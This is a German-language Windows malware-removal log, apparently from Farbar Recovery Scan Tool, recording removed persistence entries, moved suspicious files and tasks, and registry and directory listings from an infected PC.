"C:\Users\DefaultAppPool\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\Thomas\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Deskt.exe" => nicht gefunden
"C:\Users\ProgramData\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\Thomas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe" => nicht gefunden
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => nicht gefunden
========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe ========================
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe" => nicht gefunden
====== Ende von File: ======
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs" Ordner verschieben:
C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{C885AA15-1764-4293-B82A-0586ADD46B35} => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9FA8515B-F007-4624-90D9-859C02C34812}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FA8515B-F007-4624-90D9-859C02C34812}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA} => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F9E3B3CF-1D15-41B5-8765-D0ADC55474D5}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9E3B3CF-1D15-41B5-8765-D0ADC55474D5}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202} => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202}" => erfolgreich entfernt
StartupDir: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs <==== ACHTUNG => erfolgreich wiederhergestellt
"C:\WINDOWS\system32\GroupPolicy\Machine" Ordner verschieben:
C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\ProgramData\NTUSER.pol => erfolgreich verschoben
HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E0AD918-FE0B-47F9-BE79-CE17564845EC}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E0AD918-FE0B-47F9-BE79-CE17564845EC}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{58D77E8D-A3B3-4C34-B5E7-D9737015349A}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58D77E8D-A3B3-4C34-B5E7-D9737015349A}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt
========= type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" =========
Das System kann die angegebene Datei nicht finden.
========= Ende von CMD: =========
========= type "C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" =========
Das System kann die angegebene Datei nicht finden.
========= Ende von CMD: =========
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62BCCF6C-F99B-4298-802F-F4E862B9E379}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62BCCF6C-F99B-4298-802F-F4E862B9E379}" => nicht gefunden
C:\WINDOWS\System32\Tasks\puTcVzRKiKPfhBC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\puTcVzRKiKPfhBC" => nicht gefunden
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}" => nicht gefunden
C:\WINDOWS\System32\Tasks\yRkawdXSgdbJmzp => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\yRkawdXSgdbJmzp" => nicht gefunden
========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js ========================
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" => nicht gefunden
====== Ende von File: ======
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js" => nicht gefunden
========================= File: C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js ========================
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" => nicht gefunden
====== Ende von File: ======
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js" => nicht gefunden
"Edge Notifications" => erfolgreich entfernt
"Chrome Notifications" => erfolgreich entfernt
C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\5pbxmky2.default\user.js => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\Mozilla\Firefox\Profiles\37niltkt.default-release\user.js => erfolgreich verschoben
"HKLM\Software\Mozilla\Firefox\Extensions\\bdwtwe@bitdefender.com" => erfolgreich entfernt
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\bdwtwe@bitdefender.com" => erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\semav6msr64 => erfolgreich entfernt
semav6msr64 => Dienst erfolgreich entfernt
C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6 => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\MSBuild.exe => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Roaming\Microsoft\Teams" => wurde entsperrt
C:\Program Files (x86)\dialogysclip.bat => erfolgreich verschoben
C:\Program Files (x86)\DialogysUninstWPS.bat => erfolgreich verschoben
C:\Program Files (x86)\Exiferupdate.ini => erfolgreich verschoben
C:\Program Files (x86)\INSTALL.LOG => erfolgreich verschoben
C:\Program Files (x86)\MacroRecorder.lnk => erfolgreich verschoben
C:\Program Files (x86)\UninstScript.EXE => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\MSBuild.exe" => nicht gefunden
"C:\Users\user.domäne\AppData\Roaming\RegSvcs.exe" => nicht gefunden
C:\Users\user.domäne\AppData\Roaming\rvhost.vbe.zaak => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\winscp.rnd => erfolgreich verschoben
C:\Users\user.domäne\AppData\Roaming\WrapAnGo_Install.log => erfolgreich verschoben
"C:\Users\user.domäne\AppData\Local\Adobe Für Web speichern 13.0 Prefs" => nicht gefunden
C:\Users\user.domäne\AppData\Local\https_www.amazon.de_0.localstorage => erfolgreich verschoben
C:\Users\user.domäne\AppData\Local\{9F850872-AAD4-4482-A31A-2969AE3AEF22} => erfolgreich verschoben
========= reg query "HKCU\Software\yRkawdXSgdbJmzp" /S =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= Ende von CMD: =========
HKCU\Software\yRkawdXSgdbJmzp => nicht gefunden
========= reg query "HKCU\Software\3cec14c682a69cb8fafb5026acd55133" /S =========
FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.
========= Ende von CMD: =========
HKCU\Software\3cec14c682a69cb8fafb5026acd55133 => nicht gefunden
========= reg query "HKCU\Software" =========
HKEY_CURRENT_USER\Software
(Standard) REG_SZ
HKEY_CURRENT_USER\Software\4kdownload.com
HKEY_CURRENT_USER\Software\7-Zip
HKEY_CURRENT_USER\Software\ABBYY
HKEY_CURRENT_USER\Software\Acronis
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\Adobe Lightroom
HKEY_CURRENT_USER\Software\Akeo Consulting
HKEY_CURRENT_USER\Software\appdatalow
HKEY_CURRENT_USER\Software\Apple Inc.
HKEY_CURRENT_USER\Software\Ashampoo
HKEY_CURRENT_USER\Software\ASPOA GmbH
HKEY_CURRENT_USER\Software\Aura
HKEY_CURRENT_USER\Software\Autodesk
HKEY_CURRENT_USER\Software\Avast Software
HKEY_CURRENT_USER\Software\AVM
HKEY_CURRENT_USER\Software\Azureus
HKEY_CURRENT_USER\Software\B0A95C82BA6D3B5A9F4A
HKEY_CURRENT_USER\Software\bis
HKEY_CURRENT_USER\Software\Bitdefender Anti Tracker
HKEY_CURRENT_USER\Software\Bitdefender VPN
HKEY_CURRENT_USER\Software\Blackmagic Design
HKEY_CURRENT_USER\Software\Blender Foundation
HKEY_CURRENT_USER\Software\Borland
HKEY_CURRENT_USER\Software\BranchIO
HKEY_CURRENT_USER\Software\Brother Industries, Ltd.
HKEY_CURRENT_USER\Software\BugSplat
HKEY_CURRENT_USER\Software\Buhl Data Service GmbH
HKEY_CURRENT_USER\Software\Canon
HKEY_CURRENT_USER\Software\Canon Electronics Inc.
HKEY_CURRENT_USER\Software\ChangeTracker
HKEY_CURRENT_USER\Software\Chromium
HKEY_CURRENT_USER\Software\Citrix
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\ClockworkMod
HKEY_CURRENT_USER\Software\Cygnus Solutions
HKEY_CURRENT_USER\Software\Cygwin
HKEY_CURRENT_USER\Software\DATAKAM PLAYER
HKEY_CURRENT_USER\Software\DBFViewer2000
HKEY_CURRENT_USER\Software\DeepL
HKEY_CURRENT_USER\Software\Dropbox
HKEY_CURRENT_USER\Software\DropboxUpdate
HKEY_CURRENT_USER\Software\DuoDianApp
HKEY_CURRENT_USER\Software\DYMO
HKEY_CURRENT_USER\Software\ecce-terram.de
HKEY_CURRENT_USER\Software\Edge
HKEY_CURRENT_USER\Software\ej-technologies
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_A0
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_EHD
HKEY_CURRENT_USER\Software\ENE_RGB_HAL_SSS
HKEY_CURRENT_USER\Software\Epic Games
HKEY_CURRENT_USER\Software\EPSON
HKEY_CURRENT_USER\Software\F-Secure
HKEY_CURRENT_USER\Software\Fortinet
HKEY_CURRENT_USER\Software\Fritzing
HKEY_CURRENT_USER\Software\Ghisler
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\Governikus GmbH & Co. KG
HKEY_CURRENT_USER\Software\Hewlett-Packard
HKEY_CURRENT_USER\Software\HmelyoffLabs
HKEY_CURRENT_USER\Software\Icaros
HKEY_CURRENT_USER\Software\IM Providers
HKEY_CURRENT_USER\Software\Image-Line
HKEY_CURRENT_USER\Software\Intel
HKEY_CURRENT_USER\Software\IPSView
HKEY_CURRENT_USER\Software\iSpring Solutions
HKEY_CURRENT_USER\Software\Jabra
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Khronos
HKEY_CURRENT_USER\Software\Kodak
HKEY_CURRENT_USER\Software\Lenovo
HKEY_CURRENT_USER\Software\LG Soft India
HKEY_CURRENT_USER\Software\LinuxLive
HKEY_CURRENT_USER\Software\LogiShrd
HKEY_CURRENT_USER\Software\Logitech
HKEY_CURRENT_USER\Software\Magnet
HKEY_CURRENT_USER\Software\Malwarebytes
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\MAY Computer
HKEY_CURRENT_USER\Software\MediaChance
HKEY_CURRENT_USER\Software\Meltytech
HKEY_CURRENT_USER\Software\Micah Lee
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\MiniTool Software Limited
HKEY_CURRENT_USER\Software\MJTNET
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\mRemoteNG
HKEY_CURRENT_USER\Software\MTK
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\No Bull Software
HKEY_CURRENT_USER\Software\nwjs
HKEY_CURRENT_USER\Software\OCS
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\orwonet.de
HKEY_CURRENT_USER\Software\Paragon Software
HKEY_CURRENT_USER\Software\PDF Labs
HKEY_CURRENT_USER\Software\Piriform
HKEY_CURRENT_USER\Software\PITTA
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\QtProject
HKEY_CURRENT_USER\Software\Raspberry Pi
HKEY_CURRENT_USER\Software\Realtek
HKEY_CURRENT_USER\Software\RegisteredApplications
HKEY_CURRENT_USER\Software\REINER SCT
HKEY_CURRENT_USER\Software\repairit
HKEY_CURRENT_USER\Software\rmonline
HKEY_CURRENT_USER\Software\Samsung
HKEY_CURRENT_USER\Software\SimonTatham
HKEY_CURRENT_USER\Software\SketchUp
HKEY_CURRENT_USER\Software\SoftPerfect
HKEY_CURRENT_USER\Software\SoftVoice
HKEY_CURRENT_USER\Software\Spoon
HKEY_CURRENT_USER\Software\Start14
HKEY_CURRENT_USER\Software\SubSystems
HKEY_CURRENT_USER\Software\Synology
HKEY_CURRENT_USER\Software\TeamViewer
HKEY_CURRENT_USER\Software\TechSmith
HKEY_CURRENT_USER\Software\TelegramDesktop
HKEY_CURRENT_USER\Software\Tor Project
HKEY_CURRENT_USER\Software\Trolltech
HKEY_CURRENT_USER\Software\UltiMaker
HKEY_CURRENT_USER\Software\Ultimaker B.V.
HKEY_CURRENT_USER\Software\VB and VBA Program Settings
HKEY_CURRENT_USER\Software\VMware, Inc.
HKEY_CURRENT_USER\Software\WinMTR
HKEY_CURRENT_USER\Software\WinNUT
HKEY_CURRENT_USER\Software\WinRAR SFX
HKEY_CURRENT_USER\Software\Wireshark
HKEY_CURRENT_USER\Software\WOI
HKEY_CURRENT_USER\Software\Wondershare
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\WPCubed
HKEY_CURRENT_USER\Software\WST
HKEY_CURRENT_USER\Software\XSplit
HKEY_CURRENT_USER\Software\Zero Install
HKEY_CURRENT_USER\Software\Classes
========= Ende von CMD: =========
========= reg query "HKLM\Software" /reg:32 =========
HKEY_LOCAL_MACHINE\Software\ABBYY
HKEY_LOCAL_MACHINE\Software\Acronis
HKEY_LOCAL_MACHINE\Software\Adobe
HKEY_LOCAL_MACHINE\Software\Advanced Card Systems Ltd.
HKEY_LOCAL_MACHINE\Software\Apple Inc.
HKEY_LOCAL_MACHINE\Software\Ashampoo
HKEY_LOCAL_MACHINE\Software\ASIO
HKEY_LOCAL_MACHINE\Software\ASIO4ALL
HKEY_LOCAL_MACHINE\Software\ASPOA GmbH
HKEY_LOCAL_MACHINE\Software\Avast Software
HKEY_LOCAL_MACHINE\Software\AVM
HKEY_LOCAL_MACHINE\Software\Benjamin Bentmann
HKEY_LOCAL_MACHINE\Software\Bitdefender Agent
HKEY_LOCAL_MACHINE\Software\Blackmagic Design
HKEY_LOCAL_MACHINE\Software\Brother Industries, Ltd.
HKEY_LOCAL_MACHINE\Software\Brownson
HKEY_LOCAL_MACHINE\Software\Buhl Data Service GmbH
HKEY_LOCAL_MACHINE\Software\Business Objects
HKEY_LOCAL_MACHINE\Software\Canon
HKEY_LOCAL_MACHINE\Software\Canon Electronics Inc.
HKEY_LOCAL_MACHINE\Software\Caphyon
HKEY_LOCAL_MACHINE\Software\Citrix
HKEY_LOCAL_MACHINE\Software\Creality3D
HKEY_LOCAL_MACHINE\Software\Cygnus Solutions
HKEY_LOCAL_MACHINE\Software\Cygwin
HKEY_LOCAL_MACHINE\Software\devolo
HKEY_LOCAL_MACHINE\Software\Dialogys
HKEY_LOCAL_MACHINE\Software\dotnet
HKEY_LOCAL_MACHINE\Software\DroidCam
HKEY_LOCAL_MACHINE\Software\Dropbox
HKEY_LOCAL_MACHINE\Software\DropboxUpdate
HKEY_LOCAL_MACHINE\Software\DuoDianOnline
HKEY_LOCAL_MACHINE\Software\ej-technologies
HKEY_LOCAL_MACHINE\Software\Epic Games
HKEY_LOCAL_MACHINE\Software\EpicGames
HKEY_LOCAL_MACHINE\Software\EPSON
HKEY_LOCAL_MACHINE\Software\F-Secure
HKEY_LOCAL_MACHINE\Software\Ghisler
HKEY_LOCAL_MACHINE\Software\Google
HKEY_LOCAL_MACHINE\Software\Hewlett-Packard
HKEY_LOCAL_MACHINE\Software\HiBase Group
HKEY_LOCAL_MACHINE\Software\Icaros
HKEY_LOCAL_MACHINE\Software\Image-Line
HKEY_LOCAL_MACHINE\Software\Intel
HKEY_LOCAL_MACHINE\Software\iSpring Solutions
HKEY_LOCAL_MACHINE\Software\Jabra
HKEY_LOCAL_MACHINE\Software\JavaSoft
HKEY_LOCAL_MACHINE\Software\JreMetrics
HKEY_LOCAL_MACHINE\Software\Khronos
HKEY_LOCAL_MACHINE\Software\Lenovo
HKEY_LOCAL_MACHINE\Software\LG Electronics Inc
HKEY_LOCAL_MACHINE\Software\LGDDCIStack
HKEY_LOCAL_MACHINE\Software\Malwarebytes
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\MAXSOFT-OCRON
HKEY_LOCAL_MACHINE\Software\Microsoft
HKEY_LOCAL_MACHINE\Software\Mozilla
HKEY_LOCAL_MACHINE\Software\MozillaPlugins
HKEY_LOCAL_MACHINE\Software\mRemoteNG
HKEY_LOCAL_MACHINE\Software\Nikon
HKEY_LOCAL_MACHINE\Software\Nikon Corporation
HKEY_LOCAL_MACHINE\Software\Notepad++
HKEY_LOCAL_MACHINE\Software\OBS Studio
HKEY_LOCAL_MACHINE\Software\ODBC
HKEY_LOCAL_MACHINE\Software\Pixel Translations
HKEY_LOCAL_MACHINE\Software\PowerPivot
HKEY_LOCAL_MACHINE\Software\Propellerhead Software
HKEY_LOCAL_MACHINE\Software\Realtek
HKEY_LOCAL_MACHINE\Software\Realtek Semiconductor Corp.
HKEY_LOCAL_MACHINE\Software\repairit
HKEY_LOCAL_MACHINE\Software\Samsung
HKEY_LOCAL_MACHINE\Software\SANEWinDS
HKEY_LOCAL_MACHINE\Software\SoftVoice
HKEY_LOCAL_MACHINE\Software\StarFinanz
HKEY_LOCAL_MACHINE\Software\TeamViewer
HKEY_LOCAL_MACHINE\Software\TechSmith
HKEY_LOCAL_MACHINE\Software\ThinPrint
HKEY_LOCAL_MACHINE\Software\Trolltech
HKEY_LOCAL_MACHINE\Software\TVInstallTemp
HKEY_LOCAL_MACHINE\Software\VMware, Inc.
HKEY_LOCAL_MACHINE\Software\Volatile
HKEY_LOCAL_MACHINE\Software\WafCX
HKEY_LOCAL_MACHINE\Software\Winbond Auto-Copy
HKEY_LOCAL_MACHINE\Software\Wondershare
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\Software\XSplit
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Clients
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\Software\RegisteredApplications
========= Ende von CMD: =========
========= reg query "HKLM\Software" /reg:64 =========
HKEY_LOCAL_MACHINE\Software
(Standard) REG_SZ
HKEY_LOCAL_MACHINE\Software\14607473-30db-509f-94f0-bb7c085c619e
HKEY_LOCAL_MACHINE\Software\1D0EC6DE-4A80-4CC3-A335-E6E41C951198
HKEY_LOCAL_MACHINE\Software\64954139-9cf6-59bf-952e-0637eb939033
HKEY_LOCAL_MACHINE\Software\7-Zip
HKEY_LOCAL_MACHINE\Software\ABBYY
HKEY_LOCAL_MACHINE\Software\Acronis
HKEY_LOCAL_MACHINE\Software\Adobe
HKEY_LOCAL_MACHINE\Software\Advanced Card Systems Ltd.
HKEY_LOCAL_MACHINE\Software\AE Protection
HKEY_LOCAL_MACHINE\Software\Apple Inc.
HKEY_LOCAL_MACHINE\Software\Ashampoo
HKEY_LOCAL_MACHINE\Software\ASIO
HKEY_LOCAL_MACHINE\Software\Avast Software
HKEY_LOCAL_MACHINE\Software\Azureus
HKEY_LOCAL_MACHINE\Software\Bambulab
HKEY_LOCAL_MACHINE\Software\Blackmagic Design
HKEY_LOCAL_MACHINE\Software\Brother Industries, Ltd.
HKEY_LOCAL_MACHINE\Software\Canon
HKEY_LOCAL_MACHINE\Software\Caphyon
HKEY_LOCAL_MACHINE\Software\Chromium
HKEY_LOCAL_MACHINE\Software\cl2021.upgrade
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Clients
HKEY_LOCAL_MACHINE\Software\CVSM
HKEY_LOCAL_MACHINE\Software\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\Software\dotnet
HKEY_LOCAL_MACHINE\Software\DownloadHelper
HKEY_LOCAL_MACHINE\Software\DYMO
HKEY_LOCAL_MACHINE\Software\ej-technologies
HKEY_LOCAL_MACHINE\Software\F-Secure
HKEY_LOCAL_MACHINE\Software\Fortinet
HKEY_LOCAL_MACHINE\Software\Ghisler
HKEY_LOCAL_MACHINE\Software\GIMP 2.10
HKEY_LOCAL_MACHINE\Software\Google
HKEY_LOCAL_MACHINE\Software\Governikus GmbH & Co. KG
HKEY_LOCAL_MACHINE\Software\Hewlett-Packard
HKEY_LOCAL_MACHINE\Software\HiJackThis+
HKEY_LOCAL_MACHINE\Software\HP
HKEY_LOCAL_MACHINE\Software\Icaros
HKEY_LOCAL_MACHINE\Software\IM Providers
HKEY_LOCAL_MACHINE\Software\Image-Line
HKEY_LOCAL_MACHINE\Software\Intel
HKEY_LOCAL_MACHINE\Software\IrfanView
HKEY_LOCAL_MACHINE\Software\iSpring Solutions
HKEY_LOCAL_MACHINE\Software\JavaSoft
HKEY_LOCAL_MACHINE\Software\JreMetrics
HKEY_LOCAL_MACHINE\Software\Khronos
HKEY_LOCAL_MACHINE\Software\Lenovo
HKEY_LOCAL_MACHINE\Software\Logishrd
HKEY_LOCAL_MACHINE\Software\Logitech
HKEY_LOCAL_MACHINE\Software\Malwarebytes
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Maxon
HKEY_LOCAL_MACHINE\Software\Microsoft
HKEY_LOCAL_MACHINE\Software\MiniTool Software Limited
HKEY_LOCAL_MACHINE\Software\Minnetonka Audio Software
HKEY_LOCAL_MACHINE\Software\Mozilla
HKEY_LOCAL_MACHINE\Software\mozilla.org
HKEY_LOCAL_MACHINE\Software\MozillaPlugins
HKEY_LOCAL_MACHINE\Software\Nikon
HKEY_LOCAL_MACHINE\Software\Notepad++
HKEY_LOCAL_MACHINE\Software\OBS Studio
HKEY_LOCAL_MACHINE\Software\ODBC
HKEY_LOCAL_MACHINE\Software\OEM
HKEY_LOCAL_MACHINE\Software\Open Media LLC
HKEY_LOCAL_MACHINE\Software\OpenSSH
HKEY_LOCAL_MACHINE\Software\Oracle
HKEY_LOCAL_MACHINE\Software\Partner
HKEY_LOCAL_MACHINE\Software\Piriform
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\Software\Propellerhead Software
HKEY_LOCAL_MACHINE\Software\Realtek
HKEY_LOCAL_MACHINE\Software\RegisteredApplications
HKEY_LOCAL_MACHINE\Software\REINER SCT
HKEY_LOCAL_MACHINE\Software\repairit
HKEY_LOCAL_MACHINE\Software\SAMSUNG
HKEY_LOCAL_MACHINE\Software\Setup
HKEY_LOCAL_MACHINE\Software\Shotcut
HKEY_LOCAL_MACHINE\Software\SimonTatham
HKEY_LOCAL_MACHINE\Software\SketchUp
HKEY_LOCAL_MACHINE\Software\SoftVoice
HKEY_LOCAL_MACHINE\Software\SyncIntegrationClients
HKEY_LOCAL_MACHINE\Software\Synology
HKEY_LOCAL_MACHINE\Software\TechSmith
HKEY_LOCAL_MACHINE\Software\VideoLAN
HKEY_LOCAL_MACHINE\Software\VMware, Inc.
HKEY_LOCAL_MACHINE\Software\WinChipHead
HKEY_LOCAL_MACHINE\Software\Windows
HKEY_LOCAL_MACHINE\Software\Wondershare
HKEY_LOCAL_MACHINE\Software\WOW6432Node
HKEY_LOCAL_MACHINE\Software\XSplit
========= Ende von CMD: =========
========= dir /A "c:\users\public" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 2448-20ZA
Verzeichnis von c:\users\public
04.11.2022 06:13 <DIR> .
04.11.2022 06:15 <DIR> ..
04.11.2022 06:31 <DIR> AccountPictures
25.03.2024 04:42 <DIR> Desktop
07.05.2022 06:22 174 desktop.ini
25.03.2024 14:35 <DIR> Documents
07.12.2019 10:14 <DIR> Downloads
04.11.2022 06:13 <DIR> Libraries
07.12.2019 10:14 <DIR> Music
07.12.2019 10:14 <DIR> Pictures
04.02.2021 20:54 <DIR> TechSmith
07.12.2019 10:14 <DIR> Videos
1 Datei(en), 174 Bytes
11 Verzeichnis(se), 76.498.939.904 Bytes frei
========= Ende von CMD: =========
